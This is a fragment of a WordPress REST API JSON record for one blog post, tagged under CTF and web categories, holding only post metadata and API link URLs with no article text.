[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-873","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/873","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=873"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/873\/revisions"}],"predecessor-version":[{"id":874,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/873\/revisions\/874"}],"wp:attachment":[
{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=873"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=873"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}